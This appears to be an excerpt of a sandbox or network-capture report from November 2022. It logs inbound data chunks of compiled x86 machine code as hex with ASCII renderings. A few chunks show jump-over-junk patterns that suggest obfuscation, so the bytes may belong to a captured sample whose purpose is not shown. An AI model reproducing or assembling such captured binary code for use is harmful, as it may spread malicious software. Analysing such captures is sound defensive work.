2022-11-26 10:17:52 UTC	1152	IN	Data Raw: b9 01 00 00 00 89 f2 e8 13 f6 fb ff 89 47 2c 8b 55 88 8b 45 90 b9 01 00 00 00 e8 4f f4 fb ff c6 47 2b 02 89 47 10 8b 45 90 80 78 57 00 75 69 8b 45 94 8b 90 c8 00 00 00 8b 88 cc 00 00 00 89 55 a8 89 d0 89 4d ac 80 3a 3b 74 05 01 c8 89 45 a8 8b 53 a4 c7 45 ac 00 00 00 00 89 d0 f7 d0 03 45 a8 01 d0 89 c2 48 0f b6 0a f6 81 20 f8 64 00 01 75 f1 c7 44 24 04 00 00 00 00 8b 45 94 8d 4d a8 c7 04 24 00 00 00 00 89 55 a8 31 d2 c7 45 ac 01 00 00 00 e8 5a e6 ff ff 8b 45 90 89 74 24 04 89 04 24 e8 8c 05 fb ff 8b 45 94 80 b8 d4 00 00 00 01 76 0e 83 7d 88 00 74 08 8b 55 88 e8 49 47 fb ff 8b 45 88 89 44 24 04 8b 45 90 89 04 24 e8 ea 06 fb ff e9 13 41 00 00 8b 43 f8 8b 53 04 b9 01 00 00 00 89 04 24 8b 45 94 e8 dc ba 01 00 e9 f8 40 00 00 c6 45 b0 09 8b 45 94 8d 4d b0 8b 53 Data Ascii: G,UEOG+GExWuiEUM:;tESEEH duD$EM$U1EZEt$$Ev}tUIGED$E$ACS$E@EEMS
2022-11-26 10:17:52 UTC	1168	IN	Data Raw: 8d 43 d4 8b 53 04 31 c9 89 44 24 04 8b 43 f8 89 04 24 8b 45 94 e8 19 b3 fb ff 89 43 d4 e9 c9 01 00 00 8d 43 f8 8b 53 04 c7 04 24 00 00 00 00 31 c9 89 44 24 04 8b 45 94 e8 f6 b2 fb ff 89 43 f8 e9 a6 01 00 00 c7 44 24 0c 00 00 00 00 8b 45 94 b9 5a 00 00 00 31 d2 c7 44 24 08 00 00 00 00 c7 44 24 04 55 00 00 00 c7 04 24 00 00 00 00 e8 8d 2f fc ff 89 43 10 e9 70 01 00 00 0f b6 43 04 8b 4b f8 8b 53 ec c7 44 24 08 00 00 00 00 89 44 24 0c c7 44 24 04 55 00 00 00 8b 43 fc 89 04 24 8b 45 94 e8 59 2f fc ff 89 43 ec e9 3c 01 00 00 0f b6 43 04 8b 4b e0 8b 53 c8 89 44 24 0c 8b 43 fc 89 44 24 08 8b 43 f8 89 44 24 04 8b 43 e4 89 04 24 8b 45 94 e8 27 2f fc ff 89 43 c8 e9 0a 01 00 00 0f b7 43 f6 c7 43 fc 00 00 00 00 89 43 f8 e9 f7 00 00 00 8b 43 f8 0f b7 53 02 89 43 fc 89 Data Ascii: CS1D$C$ECCS$1D$ECD$EZ1D$D$U$/CpCKSD$D$D$UC$EY/C<CKSD$CD$CD$C$E'/CCCCCSC
2022-11-26 10:17:52 UTC	1184	IN	Data Raw: ff ff 89 f2 e8 71 2e fb ff 8b 8d c8 fe ff ff 85 c0 0f 85 70 60 00 00 8b 85 e0 fe ff ff 89 70 0c 66 c7 40 10 10 00 8b 85 bc fe ff ff 0b 85 b8 fe ff ff 74 14 8b 85 e0 fe ff ff 8b bd b8 fe ff ff 66 c7 40 10 10 04 89 38 8b 85 e0 fe ff ff 8b 78 08 8d 1c 0f 83 f9 7f 7f 07 88 0f 8d 77 01 eb 16 8b 95 d8 fe ff ff 8b 8d dc fe ff ff 89 f8 e8 a5 11 fa ff 8d 34 07 8b 85 00 ff ff ff 8b 50 1c 83 fa 07 77 3c 88 16 8d 46 01 85 d2 74 79 0f b6 8a a0 ee 64 00 8b bd 00 ff ff ff 89 8d f8 fe ff ff 8b 37 89 ca 8b 7f 04 4a 89 f1 88 0c 13 74 09 0f ac fe 08 c1 ef 08 eb ef 03 9d f8 fe ff ff eb 46 83 fa 7f 77 19 88 16 8d 46 01 83 fa 0d 76 37 8b bd 00 ff ff ff 8b 4f 0c 85 c9 7e 2a eb 18 31 c9 89 f0 e8 31 11 fa ff 8b bd 00 ff ff ff 01 f0 8b 4f 0c 85 c9 74 10 8b 77 08 89 df f3 a4 8b bd Data Ascii: q.p`pf@tf@8xw4Pw<Ftyd7JtFwFv7O~*11Otw
2022-11-26 10:17:52 UTC	1200	IN	Data Raw: b5 08 ff ff ff f6 43 10 10 74 18 8b 06 8b 56 04 8b 5b 08 89 d1 89 c2 89 d8 e8 7d 4d fb ff e9 b0 1d 00 00 89 d8 e8 a1 4c fb ff 85 c0 74 dd e9 54 20 00 00 8b 85 24 ff ff ff 6b 58 04 28 03 9d 08 ff ff ff f6 43 10 10 0f 84 8c 00 00 00 8b 53 08 66 8b 42 1a a8 02 75 20 a8 01 75 17 8b 42 08 89 95 00 ff ff ff e8 86 2f f9 ff 8b 95 00 ff ff ff 89 42 08 66 83 4a 1a 03 8b 42 08 85 c0 74 5a 8b 30 8b 78 04 8b 40 08 89 42 08 85 c0 75 57 8b 02 85 c0 74 21 8b 18 89 44 24 04 8b 42 04 89 95 00 ff ff ff 89 04 24 e8 ad 90 f9 ff 8b 95 00 ff ff ff 89 d8 eb db c7 02 00 00 00 00 c7 42 08 00 00 00 00 c7 42 0c 00 00 00 00 c7 42 14 00 00 00 00 c7 42 18 00 00 01 00 eb 0c 89 d8 e8 9d 9b f9 ff e9 8d 9a ff ff 8b 85 24 ff ff ff 89 f2 89 f9 6b 40 0c 28 03 85 08 ff ff ff e8 8c 9d f9 ff e9 Data Ascii: CtV[}MLtT $kX(CSfBu uB/BfJBtZ0x@BuWt!D$B$BBBB$k@(
2022-11-26 10:17:52 UTC	1216	IN	Data Raw: 45 a4 74 43 8b 45 08 89 04 24 e8 00 f3 f7 ff 83 f8 03 74 18 b9 56 76 64 00 89 f2 89 f8 bb 01 00 00 00 e8 36 e0 fa ff e9 25 05 00 00 8b 45 08 89 04 24 e8 a8 c2 fa ff 89 c2 8b 46 3c 83 e0 fe 83 c8 06 89 46 3c eb 05 ba 20 2f 64 00 8b 46 20 8b 5e 6c 8b 4e 68 89 45 80 8b 46 24 89 9d 74 ff ff ff 8b 5e 74 89 85 7c ff ff ff 8b 46 18 89 8d 70 ff ff ff 8b 4e 70 89 45 90 8a 46 5e 89 9d 6c ff ff ff 8b 5d a0 88 85 7b ff ff ff 8b 45 90 89 8d 68 ff ff ff 8b 8d 7c ff ff ff c1 e3 04 83 c8 06 c6 46 5e 00 89 46 18 8b 45 80 83 e1 fe 89 4e 24 25 ff af ff ef 89 5d 94 0d 01 02 00 00 89 46 20 8b 46 10 01 d8 8b 08 8b 40 04 89 45 a0 8b 40 04 89 4d 98 8b 00 c7 45 84 01 00 00 00 80 78 0c 00 75 0d 80 78 10 00 0f 95 c0 0f b6 c0 89 45 84 89 54 24 0c 8b 46 14 c7 44 24 08 68 76 64 00 89 Data Ascii: EtCE$tVvd6%E$F<F< /dF ^lNhEF$t^t\|FpNpEF^l]{Eh\|F^FEN$%]F F@E@MExuxET$FD$hvd
2022-11-26 10:17:52 UTC	1232	IN	Data Raw: 00 8b 42 10 80 38 b4 0f 85 a5 00 00 00 c7 44 24 04 5c 79 64 00 89 34 24 e8 81 98 fa ff c7 85 08 ff ff ff 00 00 00 00 8b 45 10 0f bf 40 22 39 85 08 ff ff ff 0f 8d ed 00 00 00 8b 4d 10 8b 9d 08 ff ff ff 8b 41 04 c1 e3 04 01 d8 f6 40 0e 02 75 56 8b 08 ba 3b 00 00 00 89 f8 e8 42 ca fa ff 8b 95 24 ff ff ff 89 c1 89 f0 e8 80 dc fa ff 80 7f 57 00 89 85 24 ff ff ff 75 2d 8b 00 48 89 85 00 ff ff ff 8b 45 10 8b 40 04 8b 14 18 89 f8 e8 3a 9f fa ff 6b 9d 00 ff ff ff 14 03 9d 24 ff ff ff 80 63 14 fc 89 43 0c ff 85 08 ff ff ff e9 75 ff ff ff 31 c9 89 f8 e8 32 b9 fa ff 8b 95 24 ff ff ff 89 c1 89 f0 e8 24 dc fa ff 80 7f 57 00 89 85 24 ff ff ff 75 51 8b 85 10 ff ff ff 8b 54 18 0c 85 d2 74 43 8b 85 24 ff ff ff 8b 00 89 85 08 ff ff ff 8d 58 ff 89 f8 e8 d1 9e fa ff 6b db 14 Data Ascii: B8D$\yd4$E@"9MA@uV;B$W$u-HE@:k$cCu12$$W$uQTtC$Xk
2022-11-26 10:17:52 UTC	1248	IN	Data Raw: e8 89 5b fa ff c7 85 c4 fe ff ff 00 00 00 00 89 85 c0 fe ff ff c7 85 b0 fe ff ff 00 00 00 00 8d b5 d4 fe ff ff 89 da 89 f0 e8 65 ca fa ff 83 bd c0 fe ff ff 00 0f 84 62 04 00 00 8b 85 d0 fe ff ff 89 1c 24 89 44 24 04 e8 0b d1 f8 ff 89 d8 c7 85 d0 fe ff ff 00 00 00 00 e8 6c ea f9 ff 8b 45 0c 8b 4d 10 31 d2 89 04 24 89 f0 e8 69 8c ff ff 89 c7 85 c0 74 4e 8a 40 2b 3c 01 75 11 8b 45 10 c7 44 24 04 db 7a 64 00 89 44 24 08 eb 2e f6 47 1c 80 74 11 8b 45 10 c7 44 24 04 f9 7a 64 00 89 44 24 08 eb 17 3c 02 0f 85 46 01 00 00 8b 45 10 c7 44 24 04 1d 7b 64 00 89 44 24 08 89 34 24 e8 da 57 fa ff 83 bd d8 fe ff ff 00 0f 84 83 00 00 00 8b 85 d0 fe ff ff 89 1c 24 89 44 24 04 e8 75 d0 f8 ff 8b 85 d8 fe ff ff c7 85 d8 fe ff ff 00 00 00 00 89 85 d0 fe ff ff eb 59 8b 85 b8 fe Data Ascii: [eb$D$lEM1$itN@+<uED$zdD$.GtED$zdD$<FED${dD$4$W$D$uY
2022-11-26 10:17:52 UTC	1264	IN	Data Raw: c0 0f 94 45 c8 39 45 dc 72 08 31 f6 80 7d c8 00 74 03 8b 75 dc 8b 53 08 85 d2 74 17 8b 4a 2c 39 c8 77 06 80 7d c8 00 74 05 39 ce 0f 42 f1 8b 52 14 eb e5 85 f6 74 19 8b 53 3c 8b 07 e8 d5 ff f8 ff 89 f2 89 c1 89 f8 e8 eb fa ff ff 89 f0 eb af 80 7b 2b 01 0f 84 67 ff ff ff c7 44 24 0c 00 00 00 00 8b 03 ba 97 00 00 00 c7 44 24 04 00 00 00 00 8b 4d e4 89 44 24 08 8b 45 d0 c7 04 24 00 00 00 00 e8 7a 70 fa ff 8b 55 e4 89 f8 e8 90 7c fa ff 8b 45 d4 8b 5d d8 8b 40 10 8b 44 18 0c f6 40 4e 02 74 2e 8b 58 10 85 db 74 15 8b 53 08 80 7a 2b 02 75 08 8b 45 d4 e8 32 47 f9 ff 8b 1b eb e7 8b 45 d4 8b 5d d8 8b 40 10 8b 44 18 0c 66 83 60 4e fd 8b 55 cc 8b 45 e0 83 c4 3c 5b 5e 5f 5d e9 dd 41 f9 ff 55 89 e5 57 56 53 81 ec ac 00 00 00 89 45 94 8b 45 24 c7 45 a4 00 00 00 00 89 85 Data Ascii: E9Er1}tuStJ,9w}t9BRtS<{+gD$D$MD$E$zpU\|E]@D@Nt.XtSz+uE2GE]@Df`NUE<[^_]AUWVSEE$E
2022-11-26 10:17:52 UTC	1280	IN	Data Raw: 01 19 c0 25 00 01 00 00 48 89 43 48 8d 83 cc 01 00 00 89 43 10 8d 43 78 89 c7 f3 a5 c6 43 55 01 b9 01 00 00 00 c6 43 5a ff a1 68 cc 63 00 8b 15 6c cc 63 00 c7 83 a4 00 00 00 00 00 00 00 81 4b 20 e0 80 04 e0 89 43 30 89 d8 89 53 34 ba 40 f7 64 00 c7 43 64 00 00 00 00 c7 83 b8 00 00 00 90 cb 63 00 c7 83 b8 01 00 00 00 00 00 00 c7 83 b4 01 00 00 00 00 00 00 c7 83 b0 01 00 00 00 00 00 00 c7 83 bc 01 00 00 00 00 00 00 c7 83 8c 01 00 00 00 00 00 00 c7 83 88 01 00 00 00 00 00 00 c7 83 84 01 00 00 00 00 00 00 c7 83 90 01 00 00 00 00 00 00 c7 04 24 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 56 3b 4c 00 e8 d4 94 fa ff c7 44 24 08 00 00 00 00 b9 03 00 00 00 89 d8 c7 44 24 04 56 3b 4c 00 ba 40 f7 64 00 c7 04 24 00 00 00 00 e8 ac 94 fa ff c7 44 24 08 00 00 00 00 Data Ascii: %HCHCCxCUCZhclcK C0S4@dCdc$D$D$V;LD$D$V;L@d$D$
2022-11-26 10:17:52 UTC	1296	IN	Data Raw: 89 d8 e8 90 30 00 00 8b 6c 24 38 85 ed 0f 84 81 22 00 00 8b 44 24 30 89 83 14 01 00 00 85 f6 74 98 8b 44 24 14 89 83 10 01 00 00 eb 8c 8d b4 26 00 00 00 00 8d 76 00 8b 4f 0c 83 c4 7c 89 d8 ba 11 00 00 00 5b 5e 5f 5d e9 4a 30 00 00 8b 80 00 01 00 00 3d ff 00 00 00 0f 84 2f 29 00 00 8d 50 01 89 93 00 01 00 00 c6 04 03 7e c6 83 04 01 00 00 7e 8d 74 26 00 90 8b 4f 10 eb be 8d 76 00 8b 80 14 01 00 00 89 44 24 10 85 c0 0f 84 d6 00 00 00 8d b6 00 00 00 00 8b 48 08 85 c9 75 15 8b 50 04 8b 12 8d 4a e7 83 f9 02 0f 87 cd 27 00 00 39 d5 74 84 8b 00 85 c0 75 de e9 a9 00 00 00 8d b4 26 00 00 00 00 66 90 8b 80 14 01 00 00 89 4c 24 34 ba 11 00 00 00 8b 49 10 c7 44 24 38 00 00 00 00 89 44 24 30 8d 44 24 30 89 83 14 01 00 00 8b 83 10 01 00 00 89 44 24 3c 89 d8 e8 97 2f 00 Data Ascii: 0l$8"D$0tD$&vO\|[^_]J0=/)P~~t&OvD$HuPJ'9tu&fL$4ID$8D$0D$0D$</
2022-11-26 10:17:53 UTC	1312	IN	Data Raw: b6 54 24 1b 31 c9 b8 01 00 00 00 eb a1 8b 45 10 8d 7c 24 27 c7 44 24 04 08 20 65 00 89 3c 24 83 c0 01 89 44 24 08 e8 fc 89 ff ff 89 3c 24 e8 94 ac 01 00 89 c2 8b 83 00 01 00 00 85 d2 74 6e 01 fa 89 74 24 1c 89 d6 eb 1b 89 c1 83 c0 01 83 c7 01 89 83 00 01 00 00 88 14 0b 88 93 04 01 00 00 39 fe 74 45 0f b6 17 3d ff 00 00 00 75 db 8b 83 0c 01 00 00 c6 83 ff 00 00 00 00 88 54 24 1b 89 44 24 08 c7 44 24 04 ff 00 00 00 89 1c 24 ff 93 08 01 00 00 83 83 28 01 00 00 01 0f b6 54 24 1b 31 c9 b8 01 00 00 00 eb a5 8b 74 24 1c bf 91 24 65 00 ba 7d 00 00 00 eb 27 89 c1 83 c0 01 89 83 00 01 00 00 83 c7 01 88 14 0b 88 93 04 01 00 00 ba 94 24 65 00 39 fa 0f 84 b8 fe ff ff 0f b6 17 3d ff 00 00 00 75 d2 8b 83 0c 01 00 00 c6 83 ff 00 00 00 00 88 54 24 1b 89 44 24 08 c7 44 24 Data Ascii: T$1E\|$'D$ e<$D$<$tnt$9tE=uT$D$D$$(T$1t$$e}'$e9=uT$D$D$
2022-11-26 10:17:53 UTC	1328	IN	Data Raw: 54 24 08 31 c0 85 d2 75 06 c3 8d 74 26 00 90 b8 16 00 00 00 c3 66 90 55 b8 16 00 00 00 57 56 53 83 ec 2c 83 7c 24 40 02 0f 87 99 00 00 00 8b 44 24 48 f6 44 24 44 01 89 04 24 0f 85 97 00 00 00 e8 22 12 00 00 31 ed 89 c6 89 d7 eb 20 8d b4 26 00 00 00 00 8d 76 00 8b 4c 24 18 8b 5c 24 1c 29 c1 19 d3 01 ce 11 df 89 f8 09 f0 74 3f b8 9e 86 01 00 bb 9f 86 01 00 39 f0 89 e8 19 f8 0f 43 de e8 82 11 00 00 89 1c 24 89 54 24 1c 89 44 24 18 e8 e2 69 00 00 e8 6d 11 00 00 89 c1 2b 4c 24 18 89 d3 1b 5c 24 1c 39 f1 19 fb 72 ab 8b 54 24 4c 31 c0 85 d2 74 11 8b 54 24 4c c7 02 00 00 00 00 c7 42 04 00 00 00 00 83 c4 2c 5b 5e 5f 5d c3 8d b4 26 00 00 00 00 90 e8 db 11 00 00 e9 64 ff ff ff 8d b6 00 00 00 00 8b 44 24 04 8b 54 24 08 85 c0 74 14 83 fa 01 77 0f c7 00 00 00 00 00 74 Data Ascii: T$1ut&fUWVS,\|$@D$HD$D$"1 &vL$\$)t?9C$T$D$im+L$\$9rT$L1tT$LB,[^_]&dD$T$twt
2022-11-26 10:17:53 UTC	1344	IN	Data Raw: c5 65 00 b8 24 c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 10 20 c5 65 00 b8 20 c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 14 1c c5 65 00 b8 1c c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 18 0c cd 63 00 b8 0c cd 63 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 1c 08 cd 63 00 b8 08 cd 63 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 20 18 c5 65 00 b8 18 c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 24 14 c5 65 00 b8 14 c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 28 10 c5 65 00 b8 10 c5 65 00 c3 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 a1 40 c5 65 00 c7 40 2c Data Ascii: e$e&&@e@ e e&&@e@ee&&@e@cc&&@e@cc&&@e@ ee&&@e@$ee&&@e@(ee&&@e@,
2022-11-26 10:17:53 UTC	1360	IN	Data Raw: 81 00 00 00 c3 66 90 b8 16 00 00 00 c3 8d b4 26 00 00 00 00 8d 76 00 8b 54 24 04 8b 44 24 08 85 d2 74 14 85 c0 74 10 c7 00 00 00 00 00 31 c0 c3 8d b4 26 00 00 00 00 b8 16 00 00 00 c3 8d b4 26 00 00 00 00 8d 76 00 53 b8 03 00 00 00 83 ec 28 8b 5c 24 30 85 db 74 66 89 1c 24 e8 57 c1 ff ff 8b 48 68 85 c9 74 23 8b 40 14 8d 50 ff 83 fa fd 77 55 8d 54 24 1c 89 04 24 89 54 24 04 ff 15 ac e4 65 00 83 ec 08 85 c0 74 3d 8b 54 24 38 85 d2 74 45 8b 44 24 34 85 c0 74 3d 89 1c 24 e8 15 c1 ff ff 8b 4c 24 34 8b 40 64 89 01 89 1c 24 e8 04 c1 ff ff 8b 4c 24 38 8b 40 6c 89 01 31 c0 83 c4 28 5b c3 8d 74 26 00 83 c4 28 b8 03 00 00 00 5b c3 8d b6 00 00 00 00 83 c4 28 b8 16 00 00 00 5b c3 8d b6 00 00 00 00 56 b8 03 00 00 00 53 83 ec 24 8b 5c 24 30 85 db 0f 84 b1 00 00 00 89 1c Data Ascii: f&vT$D$tt1&&vS(\$0tf$WHht#@PwUT$$T$et=T$8tED$4t=$L$4@d$L$8@l1([t&([([VS$\$0
2022-11-26 10:17:53 UTC	1376	IN	Data Raw: 01 89 6c 24 40 89 44 24 5c 8b 44 24 54 8b 7c 24 58 8d 04 80 8d 04 47 31 ff 89 44 24 54 e9 73 fd ff ff c7 44 24 74 01 00 00 00 8d 45 01 89 84 24 b8 00 00 00 0f b6 4d 01 84 c9 0f 84 a7 f0 ff ff 89 c5 e9 10 f0 ff ff c7 44 24 74 00 00 00 00 eb d9 8b 84 24 bc 00 00 00 89 7c 24 04 89 04 24 e8 b3 a2 00 00 01 bc 24 b0 00 00 00 89 84 24 bc 00 00 00 e9 20 f8 ff ff 8d 9c 24 b8 00 00 00 c7 44 24 04 c0 43 65 00 89 1c 24 e8 39 aa 00 00 85 c0 0f 84 41 f1 ff ff c7 44 24 04 c3 43 65 00 89 1c 24 83 ac 24 b8 00 00 00 01 e8 19 aa 00 00 85 c0 75 08 83 84 24 b8 00 00 00 01 c7 84 24 ac 00 00 00 03 00 00 00 8b 84 24 e8 00 00 00 8b bc 24 ec 00 00 00 8b 40 08 83 c0 01 89 07 8b 84 24 bc 00 00 00 e9 10 f1 ff ff 8b 74 24 7c 89 f0 83 fe ea 0f 8c 75 f6 ff ff 8b 44 24 5c 2b 44 24 58 dd Data Ascii: l$@D$\D$T\|$XG1D$TsD$tE$MD$t$\|$$$$ $D$Ce$9AD$Ce$$u$$$$@$t$\|uD$\+D$X
2022-11-26 10:17:53 UTC	1392	IN	Data Raw: 8b 94 24 84 00 00 00 39 94 24 88 00 00 00 7e 1e 8b 54 24 64 80 e7 20 0f 85 8a 00 00 00 8b 84 24 84 00 00 00 88 0c 02 8b 94 24 84 00 00 00 83 c2 01 89 94 24 84 00 00 00 0f b6 4d 00 83 c5 01 0f be c1 85 c0 0f 84 95 00 00 00 83 f8 25 75 a8 8b 44 24 2c c7 44 24 70 ff ff ff ff c7 44 24 6c ff ff ff ff 89 44 24 68 0f b6 45 00 84 c0 74 70 8d 5c 24 6c c7 44 24 28 00 00 00 00 89 ee 31 c9 89 5c 24 30 89 6c 24 34 8d 50 e0 8d 5e 01 0f be e8 80 fa 5a 77 62 0f b6 d2 ff 24 95 40 45 65 00 8d b4 26 00 00 00 00 90 89 54 24 04 89 04 24 e8 0c 6d 00 00 8b 94 24 84 00 00 00 e9 6f ff ff ff c7 44 24 28 00 00 00 00 0f b6 46 01 b9 04 00 00 00 89 de 8d 74 26 00 90 84 c0 75 ac 8d 74 26 00 8b 84 24 84 00 00 00 81 c4 9c 00 00 00 5b 5e 5f 5d c3 8d b6 00 00 00 00 83 e8 30 3c 09 0f 87 df Data Ascii: $9$~T$d $$$M%uD$,D$pD$lD$hEtp\$lD$(1\$0l$4P^Zwb$@Ee&T$$m$oD$(Ft&ut&$[^_]0<
2022-11-26 10:17:53 UTC	1408	IN	Data Raw: 00 00 8b 44 24 60 8b 74 24 54 c7 84 24 9c 00 00 00 01 00 00 00 89 44 24 38 e9 c4 00 00 00 8d b4 26 00 00 00 00 66 90 89 14 24 e8 58 1d 00 00 b8 01 00 00 00 85 db 0f 88 4b 06 00 00 0b 5c 24 10 75 0d 8b 5c 24 24 f6 03 01 0f 84 38 06 00 00 8b 4c 24 38 8d 59 01 89 da 85 c0 7e 0b 83 7c 24 58 02 0f 85 1d 08 00 00 0f b6 44 24 28 88 43 ff 8b 44 24 48 39 84 24 9c 00 00 00 0f 84 36 08 00 00 89 2c 24 c7 44 24 08 00 00 00 00 c7 44 24 04 0a 00 00 00 e8 5f 1d 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 0a 00 00 00 89 c5 89 3c 24 39 f7 0f 84 4a 01 00 00 e8 3d 1d 00 00 89 34 24 c7 44 24 08 00 00 00 00 89 c7 c7 44 24 04 0a 00 00 00 e8 23 1d 00 00 89 c6 83 84 24 9c 00 00 00 01 89 5c 24 38 8b 44 24 40 89 2c 24 89 44 24 04 e8 55 f1 ff ff 89 7c 24 04 89 2c 24 89 c1 83 c1 30 89 Data Ascii: D$`t$T$D$8&f$XK\$u\$$8L$8Y~\|$XD$(CD$H9$6,$D$D$_D$D$<$9J=4$D$D$#$\$8D$@,$D$U\|$,$0
2022-11-26 10:17:53 UTC	1424	IN	Data Raw: 44 24 34 90 4a 63 00 89 04 24 c7 44 24 38 88 82 63 00 89 6c 24 3c c7 44 24 40 3c 4a 56 00 89 64 24 44 e8 60 77 fe ff ba 0a 04 65 00 8d 4c 24 57 c7 44 24 58 7c 9a 65 00 89 d0 c7 44 24 20 02 00 00 00 e8 10 71 06 00 c7 04 24 08 00 00 00 8d 54 24 58 89 44 24 5c 8b 44 24 70 c7 44 24 58 14 9b 65 00 c7 44 24 20 01 00 00 00 e8 08 b6 a9 ff 8b 44 24 74 c7 44 24 20 01 00 00 00 e8 f7 b5 a9 ff 8b 54 24 70 89 44 24 04 89 d0 89 54 24 08 83 c0 04 89 04 24 e8 7e f7 ff ff 8d 4c 24 58 e8 15 5e 07 00 8d 44 24 1c 89 04 24 e8 a9 79 fe ff 83 c4 68 5d c3 8b 44 24 24 89 44 24 18 8b 44 24 20 85 c0 75 1d 8d 4c 24 58 e8 eb 5d 07 00 8b 44 24 18 c7 44 24 20 ff ff ff ff 89 04 24 e8 67 7b fe ff 83 e8 01 75 1d 8d 4c 24 58 e8 99 4d 0c 00 8b 44 24 18 c7 44 24 20 ff ff ff ff 89 04 24 e8 45 Data Ascii: D$4Jc$D$8cl$<D$@<JVd$D`weL$WD$X\|eD$ q$T$XD$\D$pD$XeD$ D$tD$ T$pD$T$$~L$X^D$$yh]D$$D$D$ uL$X]D$D$ $g{uL$XMD$D$ $E
2022-11-26 10:17:53 UTC	1440	IN	Data Raw: 52 ba 71 6e 00 00 ba 78 23 00 00 ba 9d 4e 00 00 ba b5 7e 00 00 5a ba 8a 47 00 00 ba 60 6d 00 00 ba f3 17 00 00 5a e9 3d fa ff ff eb 19 95 b5 2d 48 e2 e4 4b a3 02 c3 14 79 65 e9 06 b2 fe ef c9 d2 e3 e8 e4 70 46 90 8d 45 84 89 04 24 50 58 e8 03 3a fe ff 8b 85 7c ff ff ff eb 05 b8 a8 24 1c 6c 8b 5d fc c9 c2 18 00 90 90 90 eb 05 f4 0a 33 45 cb eb 0f 2f b7 16 66 72 8a 7b 7c a8 80 47 bb de 0a f1 52 5a 55 89 e5 53 89 cb 50 e8 2a f4 ff ff 8d 4b 28 e8 ee e7 09 00 8b 43 18 5a 5b 5d e9 73 0c ea ff 90 90 90 90 55 89 e5 57 51 59 53 8d 45 b4 83 ec 70 c7 45 cc 90 4a 63 00 89 04 24 c7 45 d0 5e 78 63 00 89 6d d4 c7 45 d8 b4 8e 56 00 89 65 dc e8 af 36 fe ff 8b 45 0c 8b 7d 08 eb 0f 5e b6 32 2c 39 c7 04 5a cf e3 01 4d 0e 21 6b c7 45 a8 00 00 00 00 c7 45 b0 00 00 00 00 8b 40 Data Ascii: Rqnx#N~ZG`mZ=-HKyepFE$PX:\|$l]3E/fr{\|GRZUSP*K(CZ[]sUWQYSEpEJc$E^xcmEVe6E}^2,9ZM!kEE@
2022-11-26 10:17:53 UTC	1456	IN	Data Raw: bc 89 63 00 89 6d e4 c7 45 e8 47 ca 56 00 89 65 ec e8 71 f7 fd ff 8b 4d c0 c7 45 c8 ff ff ff ff e8 72 68 07 00 8b 45 c0 c7 00 f8 8c 65 00 8d 48 24 8b 45 0c c7 45 c8 01 00 00 00 89 44 24 04 8b 45 08 89 4d bc 89 04 24 e8 3a cd 06 00 8b 4d bc 83 ec 08 e8 af a0 00 00 84 c0 75 13 8d 45 c4 89 04 24 e8 f0 f9 fd ff c9 c2 0c 00 8d 74 26 00 8b 55 c0 8b 45 0c 89 42 2c 8b 45 10 89 d1 89 42 40 e8 a2 4b 07 00 8b 55 c0 31 c0 66 89 42 45 8b 42 3c c7 42 14 00 00 00 00 89 42 04 89 42 08 89 42 0c 8d 45 c4 c7 42 10 00 00 00 00 c7 42 18 00 00 00 00 89 04 24 e8 9d f9 fd ff c9 c2 0c 00 8b 45 cc 8b 4d c0 89 45 bc e8 ab 6a 07 00 8b 45 bc c7 45 c8 ff ff ff ff 89 04 24 e8 69 fb fd ff 90 90 90 90 90 90 90 90 90 55 83 ec 58 8d 54 24 1c 89 4c 24 14 89 14 24 c7 44 24 34 90 4a 63 00 c7 Data Ascii: cmEGVeqMErhEeH$EED$EM$:MuE$t&UEB,EB@KU1fBEB<BBBBEBB$EMEjEE$iUXT$L$$D$4Jc
2022-11-26 10:17:53 UTC	1472	IN	Data Raw: 90 90 90 90 90 90 90 8b 41 08 85 c0 0f 9f c0 c3 90 90 90 90 90 90 90 8b 01 8b 50 f4 8d 44 50 fe c3 90 90 90 90 90 90 8b 01 8b 50 f4 8d 04 50 c3 90 90 90 90 90 90 90 53 83 ec 18 8b 09 8b 44 24 28 8b 54 24 24 8b 59 f4 39 d8 77 4e 29 c3 39 d3 0f 47 da 85 db 74 1f 8d 04 41 83 fb 01 74 28 89 44 24 04 8b 44 24 20 8d 14 1b 89 54 24 08 89 04 24 e8 c9 2c ff ff 83 c4 18 89 d8 5b c2 0c 00 8d b4 26 00 00 00 00 90 0f b7 00 8b 54 24 20 66 89 02 83 c4 18 89 d8 5b c2 0c 00 89 5c 24 0c 89 44 24 08 c7 44 24 04 3c 06 65 00 c7 04 24 c0 05 65 00 e8 e1 b5 0b 00 90 8b 01 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 89 cb 83 ec 14 8b 74 24 20 89 34 24 e8 95 2b ff ff 89 34 24 89 d9 89 44 24 08 8b 44 24 24 89 44 24 04 e8 17 00 00 00 83 ec 0c 83 c4 14 5b 5e c2 08 00 90 90 90 90 Data Ascii: APDPPPSD$(T$$Y9wN)9GtAt(D$D$ T$$,[&T$ f[\$D$D$<e$eVSt$ 4$+4$D$D$$D$[^
